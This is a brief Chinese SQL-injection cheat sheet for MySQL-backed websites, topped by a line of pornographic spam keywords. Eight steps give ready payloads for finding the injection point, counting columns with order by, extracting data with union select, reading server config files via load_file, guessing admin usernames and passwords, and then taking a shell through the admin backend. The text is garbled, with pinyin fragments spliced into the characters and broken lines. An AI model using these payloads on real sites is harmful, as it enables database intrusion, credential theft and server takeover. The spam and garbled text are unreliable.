欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

1~判斷注入點(diǎn)~ ：’;and 1=1;and 1=2                        -------（跟ASP一樣）  
2~判斷是否能進(jìn)行UNION查詢(xún)~：and ord(mid(version(),1,1))>51                 -------（通過(guò)版本判斷4.0以上可用UNION查詢(xún)）  
3~利用order by 暴字段~：order by X                                                            -------（X為數字 如果返回正常則說(shuō)明字段大于X

）  
4~利用union來(lái)查詢(xún)準確字段~： and 1=2 union select 1,2,3,.......                 -------（返回正常，就說(shuō)明猜到準確字段數。it.Phontol.com）  
5~判斷數據庫連接賬號有沒(méi)有寫(xiě)權限~：and (select count(*) from mysql.user)>0  ------- （如果返回錯誤我們就猜管理員的賬號密碼如果返回正常，則

可以通過(guò)  
and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路徑的ascii值，用逗號隔開(kāi))),8,9,10 [注意：load_file(char(文件路徑的ascii值，用逗號隔開(kāi)

))也可以用十六進(jìn)制，通過(guò)這種方式讀取配置文件]）  
6~猜解XXXX表~：and 1=2 union select 1,2,3,4,5,6.... from user                 --------（XXXX為表單名，返回正常，說(shuō)明存在這個(gè)表）  
7~猜XXX字段~：and 1=2 union select 1,username,3,4,5,6.... from XXXX     -------（同樣道理，自己替換，如果在2字段顯示出字段內容則存在些字段

）  
8~同理再猜解password字段,猜解成功再找后臺登錄上SHELL~